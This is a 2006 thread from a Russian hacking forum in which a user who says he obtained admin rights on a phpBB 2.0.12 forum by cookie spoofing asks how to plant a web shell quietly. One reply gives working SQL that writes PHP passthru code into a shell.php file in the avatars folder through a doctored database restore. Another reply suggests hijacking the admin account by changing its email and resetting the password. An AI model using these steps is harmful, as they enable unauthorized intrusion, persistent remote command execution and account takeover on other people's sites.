ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Способы заливки шелла в phpBB 2.0.12
  #1  
Старый 10.06.2006, 23:43
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию Способы заливки шелла в phpBB 2.0.12

Получил права админа подменой кукисов, и че дальше сделать? База не сливается, не одна известная иньекция не помогает которые я пробывал, ни один сплойт с удаленными командами не работает. Люди скажите хотя бы как мне получить хеш админа? Или посоветуйте какой-нить сплойт? А может можно какими-то обходными путями залить шелл?
 
Ответить с цитированием

  #2  
Старый 10.06.2006, 23:48
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Может, чуть-чуть подробнее ситуацию опишешь, какой форум... и т.д...
 
Ответить с цитированием

  #3  
Старый 10.06.2006, 23:57
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

phpbb 2.0.12, че еще подробнее? Именно?
 
Ответить с цитированием

  #4  
Старый 11.06.2006, 00:03
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

хы, если кукисы=пасс от админки в мд5, то еще что-то сделать можно. но похоже это не так, т.е тебе нужно достать настоящий пасс.. мде, почему то именно сейчас в голову пришла неплохая мысль.. берешь в профайле меняешь мыло админа на свое, и ретривишь пароль на то мыло, которое указал.. ы черт, чтож я раньше не допер мыло админа только не забудь записать, чтоб обратно поменять.. жаль что пасс обратно нельзя будет поставить (например, если ипб, то с помощью бд хоть и сам хеш вставишь, а соль фигушки)..
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #5  
Старый 11.06.2006, 00:05
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

нет...погоди...так, а ты непробовал шелл залить или "сделать его"... ну типа в админке есть меню, я уж не помню, типа сохранить БД, вот сохраняешь её... открываешь блокнотом, или лучше Bredo'm и исчешь вот это:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
Если нашёл, то заменяешь вот на это...
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1;
А потом из этого же меню в админке востанавливаешь БД и указываешь путь к только, что исправленной БД.
Этот путь которой указан выше, от случая к случаю...
там будет осоздан обычный шелл...а там обращаешь с нему с просьбой выпонить тебе команду....вот и всё...

Последний раз редактировалось Dr.Check; 11.06.2006 в 00:08..
 
Ответить с цитированием

  #6  
Старый 11.06.2006, 00:07
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

c411k А ты уверен что он мне его пасс вышлет? Я так уже думал, если он новый сгенерирует, то че делать? Впалюсь.
 
Ответить с цитированием

  #7  
Старый 11.06.2006, 00:08
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

Dr.Check Я же написал что базу слить не могу....
 
Ответить с цитированием

  #8  
Старый 11.06.2006, 00:11
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

Цитата:
Сообщение от DimaHbl4  
c411k А ты уверен что он мне его пасс вышлет? Я так уже думал, если он новый сгенерирует, то че делать? Впалюсь.
ну так новый сгенерит и пох. зато будет админка. ты потом вбей какой нибудь default pass вбей, но мыло ему обратно смени, чтоб мог се восстановить. ну я ж писал что палево, зато работает ))
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #9  
Старый 11.06.2006, 00:14
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

c411k А мне палево не надо, тогда он везде пасс сменить, и шеллы начнет искать, и баста карапузики Все нужно делать тихо.....
 
Ответить с цитированием

  #10  
Старый 11.06.2006, 00:14
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

и загрузить тоже не чего нельзя чтоль?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите использовать багу сайта в качестве заливки шелла на сайт... PhoenixLion PHP, PERL, MySQL, JavaScript 0 23.05.2006 12:45
Способы загрузки шелла через картнику 1ten0.0net1 Форумы 16 27.03.2006 14:02
Сплойт к phpBB 2.0.12 ArdeOS Комментарии к видео 4 30.04.2005 09:27
Сплоит для заливки шелла в phpbb <= 2.0.12 Dro Форумы 0 28.03.2005 18:02
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Форумы 38 15.02.2005 16:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ